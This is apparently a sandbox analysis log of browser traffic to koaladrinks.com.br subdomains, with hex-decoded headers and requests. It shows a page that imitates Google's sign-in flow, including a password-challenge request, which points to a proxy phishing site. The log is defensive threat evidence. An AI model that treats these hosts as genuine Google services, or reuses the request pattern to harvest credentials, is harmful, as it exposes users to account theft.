                                                      2025-01-10 08:27:55 UTC40INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 43 72 65 64 65 6e 74 69 61 6c 73 3a 20 74 72 75 65 0d 0a
                                                      Data Ascii: Access-Control-Allow-Credentials: true
                                                      2025-01-10 08:27:55 UTC82INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 48 65 61 64 65 72 73 3a 20 58 2d 50 6c 61 79 6c 6f 67 2d 57 65 62 2c 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 2c 6f 72 69 67 69 6e 2c 78 2d 67 6f 6f 67 2d 61 75 74 68 75 73 65 72 0d 0a
                                                      Data Ascii: Access-Control-Allow-Headers: X-Playlog-Web,authorization,origin,x-goog-authuser
                                                      2025-01-10 08:27:55 UTC50INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4d 65 74 68 6f 64 73 3a 20 47 45 54 2c 20 50 4f 53 54 2c 20 4f 50 54 49 4f 4e 53 0d 0a
                                                      Data Ascii: Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                      2025-01-10 08:27:55 UTC66INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 69 6a 67 62 6c 6f 61 64 2e 6b 6f 61 6c 61 64 72 69 6e 6b 73 2e 63 6f 6d 2e 62 72 0d 0a
                                                      Data Ascii: Access-Control-Allow-Origin: https://ijgbload.koaladrinks.com.br
                                                      2025-01-10 08:27:55 UTC31INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 4d 61 78 2d 41 67 65 3a 20 38 36 34 30 30 0d 0a
                                                      Data Ascii: Access-Control-Max-Age: 86400
                                                      2025-01-10 08:27:55 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:55 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:55 UTC41INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/plain; charset=UTF-8
                                                      2025-01-10 08:27:55 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 37 3a 35 35 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:27:55 GMT
                                                      2025-01-10 08:27:55 UTC17INData Raw: 53 65 72 76 65 72 3a 20 50 6c 61 79 6c 6f 67 0d 0a
                                                      Data Ascii: Server: Playlog


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      61192.168.2.949790139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:54 UTC1872OUTGET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,NTMZac,NwH0H,O6y8ed,OTA3Ae,P6sQOc,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,iAskyc,inNHtf,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oLggrd,oqkvIf,p3hmRc,pxq3x,q0xTif,qPYxq,qmdT9,rmumx,rv9FVb,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,w9hDv,ws9Tlc,xBaz7b,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziXSP,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:X [TRUNCATED]
                                                      Host: www3.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
                                                      2025-01-10 08:27:54 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:54 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:27:54 UTC12INData Raw: 41 67 65 3a 20 32 32 39 33 33 0d 0a
                                                      Data Ascii: Age: 22933
                                                      2025-01-10 08:27:54 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:54 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:54 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:54 UTC46INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/javascript; charset=UTF-8
                                                      2025-01-10 08:27:54 UTC92INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 62 6f 71 2d 69 6e 66 72 61 2f 69 64 65 6e 74 69 74 79 2d 62 6f 71 2d 6a 73 2d 63 73 73 2d 73 69 67 6e 65 72 73 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers"
                                                      2025-01-10 08:27:54 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:27:54 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 32 3a 30 35 3a 34 31 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 02:05:41 GMT
                                                      2025-01-10 08:27:54 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 53 61 74 2c 20 31 30 20 4a 61 6e 20 32 30 32 36 20 30 32 3a 30 35 3a 34 31 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Sat, 10 Jan 2026 02:05:41 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      62192.168.2.949789139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:54 UTC1050OUTGET /favicon.ico HTTP/1.1
                                                      Host: ijgbload.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J
                                                      2025-01-10 08:27:55 UTC32INHTTP/1.1 302 Moved Temporarily
                                                      2025-01-10 08:27:55 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:55 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:55 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:55 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/html; charset=UTF-8
                                                      2025-01-10 08:27:55 UTC82INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 2d 52 65 70 6f 72 74 2d 4f 6e 6c 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 63 6f 6f 70 5f 67 73 65 5f 71 65 62 68 6c 6b 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
                                                      2025-01-10 08:27:55 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 37 3a 35 34 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:27:54 GMT
                                                      2025-01-10 08:27:55 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 4d 6f 6e 2c 20 30 31 20 4a 61 6e 20 31 39 39 30 20 30 30 3a 30 30 3a 30 30 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      2025-01-10 08:27:55 UTC55INData Raw: 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 73 2e 6b 6f 61 6c 61 64 72 69 6e 6b 73 2e 63 6f 6d 2e 62 72 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 0d 0a
                                                      Data Ascii: Location: https://wwws.koaladrinks.com.br/favicon.ico
                                                      2025-01-10 08:27:55 UTC18INData Raw: 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a
                                                      Data Ascii: Pragma: no-cache
                                                      2025-01-10 08:27:55 UTC134INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 67 72 6f 75 70 22 3a 22 63 6f 6f 70 5f 67 73 65 5f 71 65 62 68 6c 6b 22 2c 22 6d 61 78 5f 61 67 65 22 3a 32 35 39 32 30 30 30 2c 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 63 73 70 2e 77 69 74 68 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 63 73 70 2f 72 65 70 6f 72 74 2d 74 6f 2f 67 73 65 5f 71 65 62 68 6c 6b 22 7d 5d 7d 0d 0a
                                                      Data Ascii: Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      63192.168.2.949792139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:55 UTC1631OUTPOST /v3/signin/_/AccountsSignInUi/data/batchexecute?rpcids=WZfWSd%2CAho3hb%2Ci3kFoc%2CzKAP2e%2CRzSO2e&source-path=%2Fv3%2Fsignin%2Fchallenge%2Fpwd&f.sid=-3172993228359564282&bl=boq_identityfrontendauthuiserver_20250105.08_p0&hl=en&TL=AO-GBTeOPSBKWx6KOWwqKt4fYNm6VaeGpN7ldDzfG2E16DR1jOu6Lh9CEdomjH5B&_reqid=312469&rt=c HTTP/1.1
                                                      Host: ijgbload.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      Content-Length: 370
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      x-goog-ext-278367001-jspb: ["GlifWebSignIn"]
                                                      X-Same-Domain: 1
                                                      x-goog-ext-391502476-jspb: ["S1847760580:1736497656249061",null,null,"AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ"]
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Origin: https://ijgbload.koaladrinks.com.br
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J
                                                      2025-01-10 08:27:55 UTC370OUTData Raw: 66 2e 72 65 71 3d 25 35 42 25 35 42 25 35 42 25 32 32 57 5a 66 57 53 64 25 32 32 25 32 43 25 32 32 25 35 42 31 25 32 43 31 25 35 44 25 32 32 25 32 43 6e 75 6c 6c 25 32 43 25 32 32 31 25 32 32 25 35 44 25 32 43 25 35 42 25 32 32 41 68 6f 33 68 62 25 32 32 25 32 43 25 32 32 25 35 42 25 35 44 25 32 32 25 32 43 6e 75 6c 6c 25 32 43 25 32 32 32 25 32 32 25 35 44 25 32 43 25 35 42 25 32 32 69 33 6b 46 6f 63 25 32 32 25 32 43 25 32 32 25 35 42 25 35 44 25 32 32 25 32 43 6e 75 6c 6c 25 32 43 25 32 32 33 25 32 32 25 35 44 25 32 43 25 35 42 25 32 32 7a 4b 41 50 32 65 25 32 32 25 32 43 25 32 32 25 35 42 25 35 43 25 32 32 69 64 65 6e 74 69 74 79 2d 73 69 67 6e 69 6e 2d 70 61 73 73 77 6f 72 64 25 35 43 25 32 32 25 35 44 25 32 32 25 32 43 6e 75 6c 6c 25 32 43 25 32 32
                                                      Data Ascii: f.req=%5B%5B%5B%22WZfWSd%22%2C%22%5B1%2C1%5D%22%2Cnull%2C%221%22%5D%2C%5B%22Aho3hb%22%2C%22%5B%5D%22%2Cnull%2C%222%22%5D%2C%5B%22i3kFoc%22%2C%22%5B%5D%22%2Cnull%2C%223%22%5D%2C%5B%22zKAP2e%22%2C%22%5B%5C%22identity-signin-password%5C%22%5D%22%2Cnull%2C%22
                                                      2025-01-10 08:27:56 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:56 UTC205INData Raw: 41 63 63 65 70 74 2d 43 68 3a 20 53 65 63 2d 43 48 2d 55 41 2d 41 72 63 68 2c 20 53 65 63 2d 43 48 2d 55 41 2d 42 69 74 6e 65 73 73 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2d 4c 69 73 74 2c 20 53 65 63 2d 43 48 2d 55 41 2d 4d 6f 64 65 6c 2c 20 53 65 63 2d 43 48 2d 55 41 2d 57 6f 57 36 34 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 6f 72 6d 2d 46 61 63 74 6f 72 73 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2d 56 65 72 73 69 6f 6e 0d 0a
                                                      Data Ascii: Accept-Ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      2025-01-10 08:27:56 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:56 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:56 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:56 UTC89INData Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 72 65 73 70 6f 6e 73 65 2e 62 69 6e 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 55 54 46 2d 38 27 27 72 65 73 70 6f 6e 73 65 2e 62 69 6e 0d 0a
                                                      Data Ascii: Content-Disposition: attachment; filename="response.bin"; filename*=UTF-8''response.bin
                                                      2025-01-10 08:27:56 UTC47INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                      Data Ascii: Content-Type: application/json; charset=utf-8
                                                      2025-01-10 08:27:56 UTC83INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 2d 52 65 70 6f 72 74 2d 4f 6e 6c 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 41 63 63 6f 75 6e 74 73 53 69 67 6e 49 6e 55 69 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="AccountsSignInUi"
                                                      2025-01-10 08:27:56 UTC41INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 73 69 74 65 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: same-site
                                                      2025-01-10 08:27:56 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 37 3a 35 36 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:27:56 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      64192.168.2.949793139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:55 UTC701OUTGET /v3/signin/_/AccountsSignInUi/data/batchexecute?rpcids=V1UmUe&source-path=%2Fv3%2Fsignin%2Fidentifier&f.sid=-3172993228359564282&bl=boq_identityfrontendauthuiserver_20250105.08_p0&hl=en&_reqid=212469&rt=c HTTP/1.1
                                                      Host: ijgbload.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J
                                                      2025-01-10 08:27:56 UTC33INHTTP/1.1 405 Method Not Allowed
                                                      2025-01-10 08:27:56 UTC205INData Raw: 41 63 63 65 70 74 2d 43 68 3a 20 53 65 63 2d 43 48 2d 55 41 2d 41 72 63 68 2c 20 53 65 63 2d 43 48 2d 55 41 2d 42 69 74 6e 65 73 73 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2d 4c 69 73 74 2c 20 53 65 63 2d 43 48 2d 55 41 2d 4d 6f 64 65 6c 2c 20 53 65 63 2d 43 48 2d 55 41 2d 57 6f 57 36 34 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 6f 72 6d 2d 46 61 63 74 6f 72 73 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2d 56 65 72 73 69 6f 6e 0d 0a
                                                      Data Ascii: Accept-Ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      2025-01-10 08:27:56 UTC13INData Raw: 41 6c 6c 6f 77 3a 20 50 4f 53 54 0d 0a
                                                      Data Ascii: Allow: POST
                                                      2025-01-10 08:27:56 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:56 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:56 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:56 UTC47INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                      Data Ascii: Content-Type: application/json; charset=utf-8
                                                      2025-01-10 08:27:56 UTC83INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 2d 52 65 70 6f 72 74 2d 4f 6e 6c 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 41 63 63 6f 75 6e 74 73 53 69 67 6e 49 6e 55 69 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="AccountsSignInUi"
                                                      2025-01-10 08:27:56 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 37 3a 35 36 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:27:56 GMT
                                                      2025-01-10 08:27:56 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 4d 6f 6e 2c 20 30 31 20 4a 61 6e 20 31 39 39 30 20 30 30 3a 30 30 3a 30 30 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      2025-01-10 08:27:56 UTC196INData Raw: 50 65 72 6d 69 73 73 69 6f 6e 73 2d 50 6f 6c 69 63 79 3a 20 63 68 2d 75 61 2d 61 72 63 68 3d 2a 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 2a 2c 20 63 68 2d 75 61 2d 66 75 6c 6c 2d 76 65 72 73 69 6f 6e 3d 2a 2c 20 63 68 2d 75 61 2d 66 75 6c 6c 2d 76 65 72 73 69 6f 6e 2d 6c 69 73 74 3d 2a 2c 20 63 68 2d 75 61 2d 6d 6f 64 65 6c 3d 2a 2c 20 63 68 2d 75 61 2d 77 6f 77 36 34 3d 2a 2c 20 63 68 2d 75 61 2d 66 6f 72 6d 2d 66 61 63 74 6f 72 73 3d 2a 2c 20 63 68 2d 75 61 2d 70 6c 61 74 66 6f 72 6d 3d 2a 2c 20 63 68 2d 75 61 2d 70 6c 61 74 66 6f 72 6d 2d 76 65 72 73 69 6f 6e 3d 2a 0d 0a
                                                      Data Ascii: Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
